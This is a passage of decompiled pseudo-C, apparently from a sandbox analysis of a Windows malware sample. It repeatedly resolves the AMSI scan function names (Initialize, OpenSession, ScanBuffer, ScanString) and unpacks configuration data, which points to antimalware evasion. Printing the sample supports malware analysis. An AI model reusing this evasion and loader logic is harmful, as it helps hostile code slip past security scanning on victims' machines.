                                                                                                  					E028547B0( &_v416, _t5106, 0x2874c4c);
                                                                                                  					E02854698( &_v412, E02854964(_v416));
                                                                                                  					_pop(_t6241);
                                                                                                  					E02867B80(_v412, _t6241);
                                                                                                  					_t4805 =  *0x28a6590; // 0x29f1b78
                                                                                                  					if(E0286BEB8(_t4805, 0x28a65d4, _t6241, _t6274, _t6275, _t6284, _t6295) == 1) {
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("Initialize");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v420, E02854964(_v424));
                                                                                                  						_push(_v420);
                                                                                                  						_t5107 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v432, _t5107, 0x2874c4c);
                                                                                                  						E02854698( &_v428, E02854964(_v432));
                                                                                                  						_pop(_t6246);
                                                                                                  						E02867B80(_v428, _t6246);
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("OpenSession");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v436, E02854964(_v440));
                                                                                                  						_push(_v436);
                                                                                                  						_t5108 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v448, _t5108, 0x2874c4c);
                                                                                                  						E02854698( &_v444, E02854964(_v448));
                                                                                                  						_pop(_t6251);
                                                                                                  						E02867B80(_v444, _t6251);
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("ScanBuffer");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v452, E02854964(_v456));
                                                                                                  						_push(_v452);
                                                                                                  						_t5109 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v464, _t5109, 0x2874c4c);
                                                                                                  						E02854698( &_v460, E02854964(_v464));
                                                                                                  						_pop(_t6256);
                                                                                                  						E02867B80(_v460, _t6256);
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("ScanBuffer");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v468, E02854964(_v472));
                                                                                                  						_push(_v468);
                                                                                                  						_t5110 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v480, _t5110, 0x2874c4c);
                                                                                                  						E02854698( &_v476, E02854964(_v480));
                                                                                                  						_pop(_t6261);
                                                                                                  						E02867B80(_v476, _t6261);
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("OpenSession");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v484, E02854964(_v488));
                                                                                                  						_push(_v484);
                                                                                                  						_t5111 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v496, _t5111, 0x2874c4c);
                                                                                                  						E02854698( &_v492, E02854964(_v496));
                                                                                                  						_pop(_t6266);
                                                                                                  						E02867B80(_v492, _t6266);
                                                                                                  					}
                                                                                                  				}
                                                                                                  				_push(0x2874c4c);
                                                                                                  				_push( *0x28a65fc);
                                                                                                  				_push("OpenSession");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v1088, E02854964(_v1092));
                                                                                                  				_push(_v1088);
                                                                                                  				_t4929 =  *0x28a65fc; // 0x29f1b38
                                                                                                  				E028547B0( &_v1100, _t4929, 0x2874c4c);
                                                                                                  				E02854698( &_v1096, E02854964(_v1100));
                                                                                                  				_pop(_t5266); // executed
                                                                                                  				E02867B80(_v1096, _t5266); // executed
                                                                                                  				_push(0x2874c4c);
                                                                                                  				_push( *0x28a65fc);
                                                                                                  				_push("ScanString");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v1104, E02854964(_v1108));
                                                                                                  				_push(_v1104);
                                                                                                  				_t4930 =  *0x28a65fc; // 0x29f1b38
                                                                                                  				E028547B0( &_v1116, _t4930, 0x2874c4c);
                                                                                                  				E02854698( &_v1112, E02854964(_v1116));
                                                                                                  				_pop(_t5271); // executed
                                                                                                  				E02867B80(_v1112, _t5271);
                                                                                                  				_t2170 =  *0x28a65c8; // 0x7f3c0018
                                                                                                  				_v1016 = _t2170;
                                                                                                  				_t2171 = _v1016;
                                                                                                  				if(_t2171 != 0) {
                                                                                                  					_t2171 =  *((intOrPtr*)(_t2171 - 4));
                                                                                                  				}
                                                                                                  				_t6288 = _t2171 - 0x493e0;
                                                                                                  				if(_t2171 <= 0x493e0) {
                                                                                                  					L43:
                                                                                                  					__eflags = 0;
                                                                                                  					_pop(_t5272);
                                                                                                  					 *[fs:eax] = _t5272;
                                                                                                  					_push(0x2874c23);
                                                                                                  					E028544C4( &_v4372, 0x64);
                                                                                                  					E028544C4( &_v3972, 0x15);
                                                                                                  					E02854C24( &_v3888);
                                                                                                  					E028544A0( &_v3884);
                                                                                                  					E02854C24( &_v3880);
                                                                                                  					E028544C4( &_v3876, 0x4b);
                                                                                                  					E028544A0( &_v3564);
                                                                                                  					E028544C4( &_v3576, 3);
                                                                                                  					E028544C4( &_v3560, 0x36);
                                                                                                  					E02854C3C( &_v3344, 3);
                                                                                                  					E028544C4( &_v3332, 8);
                                                                                                  					E02854C3C( &_v3300, 6);
                                                                                                  					E028544C4( &_v3276, 8);
                                                                                                  					E028544C4( &_v2988, 0x11);
                                                                                                  					E028544A0( &_v2908);
                                                                                                  					E028544C4( &_v2920, 3);
                                                                                                  					E028544C4( &_v2904, 0xc);
                                                                                                  					E02854C24( &_v2856);
                                                                                                  					E028544A0( &_v2852);
                                                                                                  					E02854C24( &_v2848);
                                                                                                  					E028544C4( &_v2844, 0x26);
                                                                                                  					E02854C24( &_v2692);
                                                                                                  					E028544A0( &_v2688);
                                                                                                  					E02854C24( &_v2684);
                                                                                                  					E028544C4( &_v2680, 0x19);
                                                                                                  					E02854C24( &_v2580);
                                                                                                  					E028544A0( &_v2576);
                                                                                                  					E02854C24( &_v2572);
                                                                                                  					E028544C4( &_v2568, 0xd);
                                                                                                  					E028544C4( &_v2516, 0xd);
                                                                                                  					E02854C24( &_v2464);
                                                                                                  					E028544A0( &_v2460);
                                                                                                  					E02854C24( &_v2456);
                                                                                                  					E028544C4( &_v2452, 0x53);
                                                                                                  					E028544A0( &_v2108);
                                                                                                  					E028544C4( &_v2120, 3);
                                                                                                  					E028544C4( &_v2104, 0x4e);
                                                                                                  					E02854C24( &_v1792);
                                                                                                  					E028544A0( &_v1788);
                                                                                                  					E02854C24( &_v1784);
                                                                                                  					E028544C4( &_v1780, 0x10);
                                                                                                  					E028544C4( &_v1716, 0x63);
                                                                                                  					_t5294 =  *0x286bc00; // 0x286bc04
                                                                                                  					E028557A0( &_v1320, _t5294);
                                                                                                  					E028544C4( &_v1316, 0x4b);
                                                                                                  					E028544C4( &_v1012, 8);
                                                                                                  					E0285E3D8( &_v980);
                                                                                                  					E028544C4( &_v964, 0x10);
                                                                                                  					E028544C4( &_v900, 8);
                                                                                                  					E02855E70( &_v868);
                                                                                                  					E028544C4( &_v864, 0x45);
                                                                                                  					_t5300 =  *0x286bc00; // 0x286bc04
                                                                                                  					E028557A0( &_v588, _t5300);
                                                                                                  					E028544C4( &_v584, 8);
                                                                                                  					E02854C24( &_v552);
                                                                                                  					E028544C4( &_v548, 9);
                                                                                                  					E028544C4( &_v508, 3);
                                                                                                  					E028544A0( &_v512);
                                                                                                  					E028544C4( &_v496, 0x63);
                                                                                                  					return E028544C4( &_v100, 0x18);
                                                                                                  				} else {
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanBuffer");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1120, E02854964(_v1124));
                                                                                                  					_push(_v1120);
                                                                                                  					_t4933 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1132, _t4933, 0x2874c4c);
                                                                                                  					E02854698( &_v1128, E02854964(_v1132));
                                                                                                  					_pop(_t5310); // executed
                                                                                                  					E02867B80(_v1128, _t5310); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("Initialize");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1136, E02854964(_v1140));
                                                                                                  					_push(_v1136);
                                                                                                  					_t4934 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1148, _t4934, 0x2874c4c);
                                                                                                  					E02854698( &_v1144, E02854964(_v1148));
                                                                                                  					_pop(_t5315); // executed
                                                                                                  					E02867B80(_v1144, _t5315); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("OpenSession");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1152, E02854964(_v1156));
                                                                                                  					_push(_v1152);
                                                                                                  					_t4935 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1164, _t4935, 0x2874c4c);
                                                                                                  					E02854698( &_v1160, E02854964(_v1164));
                                                                                                  					_pop(_t5320); // executed
                                                                                                  					E02867B80(_v1160, _t5320); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanBuffer");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1168, E02854964(_v1172));
                                                                                                  					_push(_v1168);
                                                                                                  					_t4936 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1180, _t4936, 0x2874c4c);
                                                                                                  					E02854698( &_v1176, E02854964(_v1180));
                                                                                                  					_pop(_t5325); // executed
                                                                                                  					E02867B80(_v1176, _t5325);
                                                                                                  					_t2345 =  *0x28a6590; // 0x29f1b78
                                                                                                  					_t2346 = E02857AB0(_t2345, _t6288);
                                                                                                  					_t2347 =  *0x28a65c8; // 0x7f3c0018, executed
                                                                                                  					E0286C5D0(_t2347, 0x28a65d4,  &_v1184, _t2346, _t6275); // executed
                                                                                                  					E028544F4(0x28a6558, _v1184);
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("Initialize");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1188, E02854964(_v1192));
                                                                                                  					_push(_v1188);
                                                                                                  					_t4938 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1200, _t4938, 0x2874c4c);
                                                                                                  					E02854698( &_v1196, E02854964(_v1200));
                                                                                                  					_pop(_t5332); // executed
                                                                                                  					E02867B80(_v1196, _t5332); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanString");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1204, E02854964(_v1208));
                                                                                                  					_push(_v1204);
                                                                                                  					_t4939 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1216, _t4939, 0x2874c4c);
                                                                                                  					E02854698( &_v1212, E02854964(_v1216));
                                                                                                  					_pop(_t5337); // executed
                                                                                                  					E02867B80(_v1212, _t5337); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("OpenSession");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1220, E02854964(_v1224));
                                                                                                  					_push(_v1220);
                                                                                                  					_t4940 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1232, _t4940, 0x2874c4c);
                                                                                                  					E02854698( &_v1228, E02854964(_v1232));
                                                                                                  					_pop(_t5342); // executed
                                                                                                  					E02867B80(_v1228, _t5342); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanBuffer");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1236, E02854964(_v1240));
                                                                                                  					_push(_v1236);
                                                                                                  					_t4941 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1248, _t4941, 0x2874c4c);
                                                                                                  					E02854698( &_v1244, E02854964(_v1248));
                                                                                                  					_pop(_t5347); // executed
                                                                                                  					E02867B80(_v1244, _t5347); // executed
                                                                                                  					_t2407 =  *0x28a6558; // 0x7f200018
                                                                                                  					E0286C56C(_t2407, _t4941,  &_v1252);
                                                                                                  					E028544F4(0x28a6588, _v1252);
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("Initialize");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1256, E02854964(_v1260));
                                                                                                  					_push(_v1256);
                                                                                                  					_t4942 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1268, _t4942, 0x2874c4c);
                                                                                                  					E02854698( &_v1264, E02854964(_v1268));
                                                                                                  					_pop(_t5354); // executed
                                                                                                  					E02867B80(_v1264, _t5354); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanString");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1272, E02854964(_v1276));
                                                                                                  					_push(_v1272);
                                                                                                  					_t4943 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1284, _t4943, 0x2874c4c);
                                                                                                  					E02854698( &_v1280, E02854964(_v1284));
                                                                                                  					_pop(_t5359); // executed
                                                                                                  					E02867B80(_v1280, _t5359); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("OpenSession");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1288, E02854964(_v1292));
                                                                                                  					_push(_v1288);
                                                                                                  					_t4944 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1300, _t4944, 0x2874c4c);
                                                                                                  					E02854698( &_v1296, E02854964(_v1300));
                                                                                                  					_pop(_t5364); // executed
                                                                                                  					E02867B80(_v1296, _t5364); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanBuffer");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1304, E02854964(_v1308));
                                                                                                  					_push(_v1304);
                                                                                                  					_t4945 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1316, _t4945, 0x2874c4c);
                                                                                                  					E02854698( &_v1312, E02854964(_v1316));
                                                                                                  					_pop(_t5369); // executed
                                                                                                  					E02867B80(_v1312, _t5369); // executed
                                                                                                  					_t5370 =  *0x2877ae4; // 0x676974
                                                                                                  					E02854728( &_v1324, _t5370);
                                                                                                  					_t2469 =  *0x28a6588; // 0x7f300018, executed
                                                                                                  					E0286BF30(_t2469, 0x28a65d4,  &_v1320, _v1324, _t6274, _t6275); // executed
                                                                                                  					_t4947 =  *0x286bc00; // 0x286bc04
                                                                                                  					E028557DC(0x28a65d4, _t4947, _v1320);
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("Initialize");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1328, E02854964(_v1332));
                                                                                                  					_push(_v1328);
                                                                                                  					_t4948 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1340, _t4948, 0x2874c4c);
                                                                                                  					E02854698( &_v1336, E02854964(_v1340));
                                                                                                  					_pop(_t5377); // executed
                                                                                                  					E02867B80(_v1336, _t5377); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanString");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1344, E02854964(_v1348));
                                                                                                  					_push(_v1344);
                                                                                                  					_t4949 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1356, _t4949, 0x2874c4c);
                                                                                                  					E02854698( &_v1352, E02854964(_v1356));
                                                                                                  					_pop(_t5382); // executed
                                                                                                  					E02867B80(_v1352, _t5382); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("OpenSession");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1360, E02854964(_v1364));
                                                                                                  					_push(_v1360);
                                                                                                  					_t4950 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1372, _t4950, 0x2874c4c);
                                                                                                  					E02854698( &_v1368, E02854964(_v1372));
                                                                                                  					_pop(_t5387); // executed
                                                                                                  					E02867B80(_v1368, _t5387); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanBuffer");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1376, E02854964(_v1380));
                                                                                                  					_push(_v1376);
                                                                                                  					_t4951 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1388, _t4951, 0x2874c4c);
                                                                                                  					E02854698( &_v1384, E02854964(_v1388));
                                                                                                  					_pop(_t5392); // executed
                                                                                                  					E02867B80(_v1384, _t5392); // executed
                                                                                                  					E028544F4(0x28a6628,  *((intOrPtr*)( *0x28a65d4 + 4)));
                                                                                                  					E028544F4(0x28a6620,  *((intOrPtr*)( *0x28a65d4 + 8)));
                                                                                                  					E028544F4(0x28a65c0,  *((intOrPtr*)( *0x28a65d4 + 0xc)));
                                                                                                  					E028544F4(0x28a6624,  *((intOrPtr*)( *0x28a65d4 + 0x10)));
                                                                                                  					E028544F4(0x28a660c,  *((intOrPtr*)( *0x28a65d4 + 0x14)));
                                                                                                  					E028544F4(0x28a6610,  *((intOrPtr*)( *0x28a65d4 + 0x18)));
                                                                                                  					E028544F4(0x28a6614,  *((intOrPtr*)( *0x28a65d4 + 0x1c)));
                                                                                                  					E028544F4(0x28a6618,  *((intOrPtr*)( *0x28a65d4 + 0x20)));
                                                                                                  					E028544F4(0x28a6604,  *((intOrPtr*)( *0x28a65d4 + 0x24)));
                                                                                                  					E028544F4(0x28a657c,  *((intOrPtr*)( *0x28a65d4 + 0x28)));
                                                                                                  					E028544F4(0x28a6580,  *((intOrPtr*)( *0x28a65d4 + 0x2c)));
                                                                                                  					E028544F4(0x28a6584,  *((intOrPtr*)( *0x28a65d4 + 0x30)));
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("OpenSession");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1392, E02854964(_v1396));
                                                                                                  					_push(_v1392);
                                                                                                  					_t4952 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1404, _t4952, 0x2874c4c);
                                                                                                  					E02854698( &_v1400, E02854964(_v1404));
                                                                                                  					_pop(_t5421); // executed
                                                                                                  					E02867B80(_v1400, _t5421); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanString");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1408, E02854964(_v1412));
                                                                                                  					_push(_v1408);
                                                                                                  					_t4953 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1420, _t4953, 0x2874c4c);
                                                                                                  					E02854698( &_v1416, E02854964(_v1420));
                                                                                                  					_pop(_t5426); // executed
                                                                                                  					E02867B80(_v1416, _t5426);
                                                                                                  					_t2581 =  *0x28a65d0; // 0x29d4d80
                                                                                                  					E02854698( &_v1424, E02854964(_t2581));
                                                                                                  					if(E02857E64(_v1424) == 0) {
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("Initialize");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v1428, E02854964(_v1432));
                                                                                                  						_push(_v1428);
                                                                                                  						_t5072 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v1440, _t5072, 0x2874c4c);
                                                                                                  						E02854698( &_v1436, E02854964(_v1440));
                                                                                                  						_pop(_t6067);
                                                                                                  						E02867B80(_v1436, _t6067);
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("ScanBuffer");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v1444, E02854964(_v1448));
                                                                                                  						_push(_v1444);
                                                                                                  						_t5073 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v1456, _t5073, 0x2874c4c);
                                                                                                  						E02854698( &_v1452, E02854964(_v1456));
                                                                                                  						_pop(_t6072);
                                                                                                  						E02867B80(_v1452, _t6072);
                                                                                                  						_t4325 =  *0x28a65d0; // 0x29d4d80
                                                                                                  						E02854698( &_v1460, E02854964(_t4325));
                                                                                                  						E0285802C(_v1460);
                                                                                                  					}
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("OpenSession");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1464, E02854964(_v1468));
                                                                                                  					_push(_v1464);
                                                                                                  					_t4954 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1476, _t4954, 0x2874c4c);
                                                                                                  					E02854698( &_v1472, E02854964(_v1476));
                                                                                                  					_pop(_t5432); // executed
                                                                                                  					E02867B80(_v1472, _t5432); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanBuffer");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1480, E02854964(_v1484));
                                                                                                  					_push(_v1480);
                                                                                                  					_t4955 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1492, _t4955, 0x2874c4c);
                                                                                                  					E02854698( &_v1488, E02854964(_v1492));
                                                                                                  					_pop(_t5437); // executed
                                                                                                  					E02867B80(_v1488, _t5437);
                                                                                                  					_t2615 =  *0x28a6620; // 0x29f97a8
                                                                                                  					_v1016 = _t2615;
                                                                                                  					_t4897 = _v1016;
                                                                                                  					if(_t4897 != 0) {
                                                                                                  						_t4897 =  *((intOrPtr*)(_t4897 - 4));
                                                                                                  					}
                                                                                                  					_t2616 =  *0x28a6620; // 0x29f97a8
                                                                                                  					E028549C4(_t2616, _t4897 != 3, 1, 0x28a6620);
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("OpenSession");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1496, E02854964(_v1500));
                                                                                                  					_push(_v1496);
                                                                                                  					_t4958 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1508, _t4958, 0x2874c4c);
                                                                                                  					E02854698( &_v1504, E02854964(_v1508));
                                                                                                  					_pop(_t5443); // executed
                                                                                                  					E02867B80(_v1504, _t5443); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanString");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1512, E02854964(_v1516));
                                                                                                  					_push(_v1512);
                                                                                                  					_t4959 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1524, _t4959, 0x2874c4c);
                                                                                                  					E02854698( &_v1520, E02854964(_v1524));
                                                                                                  					_pop(_t5448); // executed
                                                                                                  					E02867B80(_v1520, _t5448); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("OpenSession");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1528, E02854964(_v1532));
                                                                                                  					_push(_v1528);
                                                                                                  					_t4960 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1540, _t4960, 0x2874c4c);
                                                                                                  					E02854698( &_v1536, E02854964(_v1540));
                                                                                                  					_pop(_t5453); // executed
                                                                                                  					E02867B80(_v1536, _t5453); // executed
                                                                                                  					_push(0x2874c4c);
                                                                                                  					_push( *0x28a65fc);
                                                                                                  					_push("ScanBuffer");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v1544, E02854964(_v1548));
                                                                                                  					_push(_v1544);
                                                                                                  					_t4961 =  *0x28a65fc; // 0x29f1b38
                                                                                                  					E028547B0( &_v1556, _t4961, 0x2874c4c);
                                                                                                  					E02854698( &_v1552, E02854964(_v1556));
                                                                                                  					_pop(_t5458); // executed
                                                                                                  					E02867B80(_v1552, _t5458);
                                                                                                  					_t2674 =  *0x28a660c; // 0x29f1bc8
                                                                                                  					E028548B0(_t2674, 0x2874db0);
                                                                                                  					if(_t4897 != 3) {
                                                                                                  						L28:
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("OpenSession");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v2108, E02854964(_v2112));
                                                                                                  						_push(_v2108);
                                                                                                  						_t4962 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v2120, _t4962, 0x2874c4c);
                                                                                                  						E02854698( &_v2116, E02854964(_v2120));
                                                                                                  						_pop(_t5464); // executed
                                                                                                  						E02867B80(_v2116, _t5464); // executed
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("ScanBuffer");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v2124, E02854964(_v2128));
                                                                                                  						_push(_v2124);
                                                                                                  						_t4963 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v2136, _t4963, 0x2874c4c);
                                                                                                  						E02854698( &_v2132, E02854964(_v2136));
                                                                                                  						_pop(_t5469); // executed
                                                                                                  						E02867B80(_v2132, _t5469); // executed
                                                                                                  						_t5470 =  *0x28a6628; // 0x29ce9d8
                                                                                                  						_t2704 =  *0x28a65c0; // 0x7edf0018, executed
                                                                                                  						E0286C07C(_t2704, _t4897,  &_v2140, _t5470, _t6274, _t6275); // executed
                                                                                                  						E028544F4(0x28a6574, _v2140);
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("Initialize");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v2144, E02854964(_v2148));
                                                                                                  						_push(_v2144);
                                                                                                  						_t4965 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v2156, _t4965, 0x2874c4c);
                                                                                                  						E02854698( &_v2152, E02854964(_v2156));
                                                                                                  						_pop(_t5476); // executed
                                                                                                  						E02867B80(_v2152, _t5476); // executed
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("OpenSession");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v2160, E02854964(_v2164));
                                                                                                  						_push(_v2160);
                                                                                                  						_t4966 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v2172, _t4966, 0x2874c4c);
                                                                                                  						E02854698( &_v2168, E02854964(_v2172));
                                                                                                  						_pop(_t5481); // executed
                                                                                                  						E02867B80(_v2168, _t5481); // executed
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("ScanBuffer");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v2176, E02854964(_v2180));
                                                                                                  						_push(_v2176);
                                                                                                  						_t4967 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v2188, _t4967, 0x2874c4c);
                                                                                                  						E02854698( &_v2184, E02854964(_v2188));
                                                                                                  						_pop(_t5486); // executed
                                                                                                  						E02867B80(_v2184, _t5486);
                                                                                                  						_t2750 =  *0x28a6618; // 0x29f1bf8
                                                                                                  						_t2751 = E02857AB0(_t2750, __eflags);
                                                                                                  						_t2752 =  *0x28a6574; // 0x7ed60018, executed
                                                                                                  						E0286C5D0(_t2752, _t4897,  &_v2192, _t2751, _t6275); // executed
                                                                                                  						E028544F4(0x28a6570, _v2192);
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("Initialize");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v2196, E02854964(_v2200));
                                                                                                  						_push(_v2196);
                                                                                                  						_t4969 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v2208, _t4969, 0x2874c4c);
                                                                                                  						E02854698( &_v2204, E02854964(_v2208));
                                                                                                  						_pop(_t5493); // executed
                                                                                                  						E02867B80(_v2204, _t5493); // executed
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("OpenSession");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v2212, E02854964(_v2216));
                                                                                                  						_push(_v2212);
                                                                                                  						_t4970 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v2224, _t4970, 0x2874c4c);
                                                                                                  						E02854698( &_v2220, E02854964(_v2224));
                                                                                                  						_pop(_t5498); // executed
                                                                                                  						E02867B80(_v2220, _t5498); // executed
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("ScanBuffer");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v2228, E02854964(_v2232));
                                                                                                  						_push(_v2228);
                                                                                                  						_t4971 =  *0x28a65fc; // 0x29f1b38
                                                                                                  						E028547B0( &_v2240, _t4971, 0x2874c4c);
                                                                                                  						E02854698( &_v2236, E02854964(_v2240));
                                                                                                  						_pop(_t5503); // executed
                                                                                                  						E02867B80(_v2236, _t5503); // executed
                                                                                                  						_t2798 =  *0x28a6570; // 0x7ecd0018
                                                                                                  						E02867C68(_t2798, _t4971,  &_v2248);
                                                                                                  						E0286C56C(_v2248, _t4971,  &_v2244);
                                                                                                  						E028544F4(0x28a65c4, _v2244);
                                                                                                  						_push(0x2874c4c);
                                                                                                  						_push( *0x28a65fc);
                                                                                                  						_push("Initialize");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v2252, E02854964(_v2256));
                                                                                                  						_push(_v2252);
